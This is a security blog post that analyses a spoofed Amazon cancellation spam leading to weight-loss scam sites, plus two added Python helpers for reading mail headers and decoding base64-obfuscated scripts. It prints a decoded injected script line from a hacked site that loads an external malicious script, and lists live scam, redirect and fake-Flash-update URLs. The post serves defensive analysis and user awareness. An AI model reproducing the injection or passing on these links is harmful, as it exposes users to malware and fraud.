We see lots of phishing attempts. When I saw this email, my immediate first thought was that it was another Amazon phish trying to get my account credentials, or even a malware download attempt; we frequently see both with similar spoofed or fake Amazon emails. But no, it is a pure and simple spam scam trying to sell you some stupid, useless weight loss remedy. If these weight loss remedies actually worked, the scammers and spammers would have no need to use social engineering methods like fake cancellations or invoices to get you to their sites.
Remember that many email clients, especially on a mobile phone or tablet, only show the Name in the From: field and not the address part in <domain.com>. That is why these scams and phishes work so well.
The email looks like:
Date: Tue 20/06/2017 21:59
Subject: Amazon.com – Your Cancellation (127-3451-3158)
Your order has been successfully canceled. For your reference, here’s a summary of your order:
You just canceled order 127-3451-3158 placed on June 20, 2017.
1 “Inquiry”; 2002, Deluxe Edition
By: Julia Douglas
Sold by: Amazon.com LLC
Thank you for visiting Amazon.com!
Earth’s Biggest Selection
Note: Only the final IP address outside of your network in the Received: fields can be trusted, as the others can be spoofed.
Received: from [188.8.131.52] (port=43199 helo=nietzsche.indirgezginler.net) by knight.knighthosting.co.uk with smtp (Exim 4.89) (envelope-from <firstname.lastname@example.org>) id 1dNNQZ-0003IF-OL for email@example.com; Tue, 20 Jun 2017 18:58:59 +0100
From: "firstname.lastname@example.org" <email@example.com>
Content-Transfer-Encoding: 7bit
To: "firstname.lastname@example.org" <email@example.com>
X-AMAZON-MAIL-RELAY-TYPE: notification
Message-ID: <firstname.lastname@example.org>
Subject: Amazon.com - Your Cancellation (127-3451-3158)
Date: Tue, 20 Jun 2017 20:59:00 +0000 (UTC)
X-AMAZON-RTE-VERSION: 2.0
Allowed-Kneecap-Marcel: D234F637D5E42AAE
Content-Type: text/html; charset=UTF-8
Reply-To: "email@example.com" <firstname.lastname@example.org>
MIME-Version: 1.0
Bounces-to: email@example.com
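As an added illustration of the note above about Received: headers (this is not code from the original post), the following Python walks the chain newest-first and stops at the first hop that a mail server we control accepted from an address outside our own network; everything below that hop is unverifiable. The sample headers are constructed around the hop quoted above, and the trusted-host and internal-network values are assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample headers, newest hop first: an assumed internal relay hop, the real hop
# quoted in the post (addresses redacted as in the post), and a forged "Amazon" hop below it.
RAW = """\
Received: from knight.knighthosting.co.uk ([10.0.0.5]) by mail.example.com; Tue, 20 Jun 2017 18:59:01 +0100
Received: from [188.8.131.52] (port=43199 helo=nietzsche.indirgezginler.net)
\tby knight.knighthosting.co.uk with smtp (Exim 4.89) id 1dNNQZ-0003IF-OL
\tfor email@example.com; Tue, 20 Jun 2017 18:58:59 +0100
Received: from mail.amazon.example ([203.0.113.9]) by nietzsche.indirgezginler.net; Tue, 20 Jun 2017 18:58:50 +0100
From: "firstname.lastname@example.org" <email@example.com>
Subject: Amazon.com - Your Cancellation (127-3451-3158)
"""
TRUSTED_MTAS = {"mail.example.com", "knight.knighthosting.co.uk"}  # hosts we run (assumed)
INTERNAL_NETS = [ip_network("10.0.0.0/8")]                          # our address space (assumed)
HOP_RE = re.compile(r"from\s+(?P<frm>\S+)(?:\s+\((?P<paren>[^)]*)\))?.*?\bby\s+(?P<by>[^\s;]+)", re.S)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HELO_RE = re.compile(r"helo=([^\s)]+)")

def unfold(raw):
    """Unfold RFC 5322 continuation lines into (name, value) pairs, in header order."""
    fields = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:
            fields[-1] += " " + line.strip()
        else:
            fields.append(line.rstrip())
    return [(n.strip().lower(), v.strip()) for n, _, v in (f.partition(":") for f in fields)]

def parse_hop(value):
    """Pull sender IP, HELO name and receiving host out of one Received: value."""
    m = HOP_RE.search(value)
    if not m:
        return None
    paren = m.group("paren") or ""
    ip, helo = IP_RE.search(m.group("frm") + " " + paren), HELO_RE.search(paren)
    return {"ip": ip and ip.group(1), "helo": helo and helo.group(1), "by": m.group("by")}

def entry_point(raw):
    """Walk Received: headers top-down (newest first) and return the first hop that a host we
    control accepted from an IP outside our network; every hop below it could be forged."""
    for name, value in unfold(raw):
        hop = parse_hop(value) if name == "received" else None
        if not hop or hop["by"] not in TRUSTED_MTAS or not hop["ip"]:
            continue  # not one of our servers, or no usable sender IP
        if any(ip_address(hop["ip"]) in net for net in INTERNAL_NETS):
            continue  # internal relay: keep walking outward
        return hop
```

The returned hop gives the connecting IP and HELO name to look up; the forged hop claiming to come from Amazon is never reached, which is exactly why it cannot be trusted.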
If you follow the link inside the email you see a webpage trying to sell you some stupid, useless weight loss remedy, looking like this: The link goes to http://bugoksts.kr/alexandre.php, which redirects to http://weight-0lospremium.world/en/uagg/forskolin/?bhu=2m6RiSzYFKGHHfPuErq1zYPsU95kCeW4
Other sites found with the same scam include:
- http://bronze-salon.com/wp-content/plugins/cherry-plugin/admin/societies.php redirects to http://diet4forlosts.world/en/uagg/forskolin/?bhu=2m6RiSzYFKGHHfPuErq1zYPsU9C7NuSw
- http://www.vinebunker.com/wp-content/incidentally.php redirects to http://fitness-4weight-losess.world/en/uagg/forskolin/?bhu=2m6Rf1QbSJC4bhJXvFZp2Ma11vMfpd3y
- http://qcblc.com/consisting.php redirects to http://diet4forweight-loss.com/en/uagg/forskolin/?bhu=2m6Rf1QbSJC4bhJXvFZp2Ma11vMhFvQY
- http://rolltime.ru/assets/images/chatting.php redirects to http://fitness-4weight-losess.world/en/uagg/forskolin/?bhu=2m6RiSzYFKGHHfPuErq1zYPsU9C8qtMr
And loads of other sites, all redirecting to the same 5 scummy spam sites.
This one is slightly more interesting:
http://jaguar-landrovervn.com/maniac.php redirects to http://loss0weight-fast.world/en/uagg/forskolin/?bhu=2m6Rf1QbSJC4bhJXvFZp2Ma11vMoBYRu
But if you try http://jaguar-landrovervn.com you get redirected to lots of other malware and dangerous sites, firstly to http://www.cpm10.com/watch which, depending on your browser, either sends you to a fake Adobe Flash Player update site http://free2update.thebigbangtoupgrading.win/?pcl=Ml-InFSRlFwDIbOVaKVaktpsd0qIm8nlQK6uNl-jFnw.&sid=VjN8MTQyMTQ4Njd8OTUxMDMxfDQ1MjU2fDE0OTc5ODU4NDF8ZTU2NTBlODUtZjIyYS00MjFlLWI1YWQtYTAwYzBiMzY4MmVifDg2LjE0Ni44My4yMzZ8MXwxNDAyMTllNzc2M2YxZGMyZTIxY2NmZWViMGUzMWRjZQ==&v_id=NG124slAGzTqPH0wv4aLhSsV3nKoL1eJ5qZGaKduRBY. or to various sex cam sites. This only happens on the first visit from an IP / browser / computer; after that you stay on the genuine landrover site.
The landrover site has a base64 encoded script embedded in the head section of the site:
Which, when decoded, gives:
Which in turn decodes to:
//document.write (s) <script src="http://keit.staticweb.tk/t6mcn1"></script>
Which then sends the browser to http://www.cpm10.com/watch, but only on the first visit; subsequent visits are ignored. This cpm10 site sends the unwitting victim to the range of sites to either get scammed, look at sex cams or download various fake Flash (VirusTotal) or Java versions (VirusTotal). On the first visit to cpm10 via the initial hacked site you are "given" a keycode, so you get something like http://www.cpm10.com/watch?key=fe0a93971e993f059d7a78bf2fa5117a. Without the keycode referrer you just get a blank page on visiting cpm10.
Doing it this way does make it harder for researchers and antivirus companies to detect and block such sites and campaigns.
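An added example, not part of the original post and not the compromised site's own code: a small Python helper that peels nested base64 layers out of a page's scripts and reports any external script URL they conceal. The sample page is constructed here to model the two-layer injection described above, with the quoted document.write line as its final layer; the `eval(atob(...))` wrapper is an assumption about how such layers are typically chained.

```python
import base64
import re

# Constructed sample page: a <head> carrying a script obfuscated with two layers of base64.
# The innermost layer is the line quoted in the post; the wrappers around it are assumed.
FINAL = '//document.write (s) <script src="http://keit.staticweb.tk/t6mcn1"></script>'
INNER = 'var s = atob("%s"); document.write(s);' % base64.b64encode(FINAL.encode()).decode()
SAMPLE_HTML = ('<html><head><title>x</title><script>eval(atob("%s"));</script></head>'
               '<body></body></html>') % base64.b64encode(INNER.encode()).decode()

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long runs of base64 alphabet
SRC_RE = re.compile(r"<script[^>]*\bsrc=[\"']?([^\"'\s>]+)", re.I)

def peel(text, max_depth=5):
    """Decode every base64 run in text and recurse into the decoded output.
    Returns the decoded layers in the order found so an analyst can see the whole chain."""
    layers = []
    for blob in B64_RE.findall(text):
        padded = blob + "=" * (-len(blob) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # a long token or hash that is not really base64 text
        layers.append(decoded)
        if max_depth > 1:
            layers.extend(peel(decoded, max_depth - 1))
    return layers

def injected_script_urls(html):
    """URLs of external scripts hidden behind one or more base64 layers in the page."""
    urls = []
    for layer in peel(html):
        urls.extend(SRC_RE.findall(layer))
    return urls
```

Run `injected_script_urls` over the saved HTML of a suspect page; plain script tags are not reported, only those reached through decoding, which is the pattern this injection relies on.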
Some of the sites I got diverted to included:
All of these emails use social engineering tricks to persuade you to open the attachments or follow the links that come with the email. Whether it is a message saying "look at this picture of me I took last night" that appears to come from a friend, or one more targeted at somebody who is likely to regularly receive PDF attachments or Word .doc attachments or any other common file that you use every day, or whether it is a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking login details: be very careful when unzipping them and make sure you have "show known file extensions" enabled. Then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened.